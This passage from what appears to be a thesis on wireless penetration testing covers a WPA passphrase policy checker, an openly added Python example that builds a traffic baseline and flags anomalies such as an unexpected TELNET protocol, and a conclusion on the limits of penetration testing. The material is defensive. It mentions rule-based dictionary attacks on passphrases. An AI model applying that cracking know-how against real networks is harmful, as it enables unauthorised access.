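    return PolicyResult(ok=not problems, problems=problems)


if __name__ == "__main__":
    # Constructed candidates: one that fails the policy, one that passes.
    for candidate in ("Summer2008!Wireless", "Rain#Tumbles7down-the&Hill"):
        result = check_wpa_passphrase(candidate)
        print(candidate, "OK" if result.ok else "REJECTED: " + "; ".join(result.problems))
```

The substitution map matters in practice: a passphrase that only swaps letters for look-alike symbols still falls to a dictionary attack with rule-based mangling, so the check normalises those substitutions before comparing against the word list.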

Finally, a security measure to detect attacks such as enumeration, denial of service and man-in-the-middle is a wireless intrusion detection system (WIDS). Knowing what is normal is crucial. Every security manager should gather from the wireless network at least the protocols in use, the minimum, maximum and average number of connections, the average throughput, and the number of users. This information is the baseline for understanding what is right and what is wrong in the wireless network. WIDS technology is moving toward the use of neural networks and fuzzy logic to define what normal traffic is and to defend the wireless network from new intrusion types.
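The baseline idea above, worked through as an added example (not code from the thesis or from any WIDS product): a known-good monitoring window is summarised into exactly the figures the text lists (protocols in use, minimum, maximum and average connections, average throughput, number of users), and each new interval is compared against that summary. The monitoring records are constructed for the example; a real WIDS would derive them from captured 802.11 frames. The deviation threshold of three standard deviations is an assumption for illustration, not a figure from the text.

```python
"""Build a 'what is normal' baseline for a WLAN and flag intervals that deviate.

Added example, not part of the thesis. SAMPLE_HISTORY is constructed data
standing in for per-interval counters a WIDS would collect from the air.
"""
from dataclasses import dataclass
from statistics import mean, pstdev
from typing import FrozenSet, List


@dataclass(frozen=True)
class Interval:
    protocols: FrozenSet[str]   # protocols observed in the interval
    connections: int            # client associations seen
    throughput_kbps: float      # average throughput over the interval
    users: int                  # distinct authenticated users


@dataclass
class Baseline:
    protocols: FrozenSet[str]
    min_connections: int
    max_connections: int
    avg_connections: float
    std_connections: float
    avg_throughput_kbps: float
    std_throughput_kbps: float
    avg_users: float
    std_users: float


def build_baseline(history: List[Interval]) -> Baseline:
    """Summarise a known-good monitoring window into the baseline figures."""
    if not history:
        raise ValueError("baseline needs at least one interval")
    conns = [i.connections for i in history]
    tput = [i.throughput_kbps for i in history]
    users = [i.users for i in history]
    return Baseline(
        protocols=frozenset().union(*(i.protocols for i in history)),
        min_connections=min(conns), max_connections=max(conns),
        avg_connections=mean(conns), std_connections=pstdev(conns),
        avg_throughput_kbps=mean(tput), std_throughput_kbps=pstdev(tput),
        avg_users=mean(users), std_users=pstdev(users),
    )


def _z(value: float, avg: float, std: float) -> float:
    # A flat baseline (zero variance) must not turn into a division by zero.
    return 0.0 if std == 0 else abs(value - avg) / std


def detect_anomalies(baseline: Baseline, now: Interval, z_limit: float = 3.0) -> List[str]:
    """Return findings for one new interval; an empty list means 'looks normal'."""
    findings: List[str] = []
    unknown = now.protocols - baseline.protocols
    if unknown:
        findings.append("protocols never seen in baseline: " + ", ".join(sorted(unknown)))
    if not (baseline.min_connections <= now.connections <= baseline.max_connections):
        findings.append(f"connections {now.connections} outside baseline range "
                        f"{baseline.min_connections}-{baseline.max_connections}")
    z = _z(now.throughput_kbps, baseline.avg_throughput_kbps, baseline.std_throughput_kbps)
    if z > z_limit:
        findings.append(f"throughput {now.throughput_kbps:.0f} kbit/s is {z:.1f} std devs from average")
    z = _z(now.users, baseline.avg_users, baseline.std_users)
    if z > z_limit:
        findings.append(f"user count {now.users} is {z:.1f} std devs from average")
    return findings


# Constructed known-good window: eight quiet intervals on a small office WLAN.
PROTOS = frozenset({"EAPOL", "DHCP", "DNS", "HTTP", "HTTPS"})
SAMPLE_HISTORY = [
    Interval(PROTOS, 40, 1200.0, 35), Interval(PROTOS, 42, 1300.0, 36),
    Interval(PROTOS, 38, 1100.0, 33), Interval(PROTOS, 45, 1400.0, 40),
    Interval(PROTOS, 41, 1250.0, 36), Interval(PROTOS, 39, 1150.0, 34),
    Interval(PROTOS, 43, 1350.0, 38), Interval(PROTOS, 44, 1300.0, 39),
]

if __name__ == "__main__":
    base = build_baseline(SAMPLE_HISTORY)
    # Constructed interval with a new protocol and a surge of associations.
    suspicious = Interval(PROTOS | {"TELNET"}, 180, 9000.0, 36)
    for line in detect_anomalies(base, suspicious) or ["no anomalies"]:
        print(line)
```

The useful property of this layout is that the baseline is a plain data object: it can be rebuilt per time-of-day or per access point, persisted, and compared later, which is what makes "knowing what is normal" operational rather than a one-off observation.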

In conclusion, penetration testing is a good method for finding holes and security flaws in all the systems of an organization. However, organizations should always be aware of the limitations of penetration testing. The results of a test only provide a snapshot of a system's security at a given time, and they are only as good as the tester conducting the test. New vulnerabilities appear frequently, and regular testing needs to be undertaken.


APPENDIX A – DISC COPY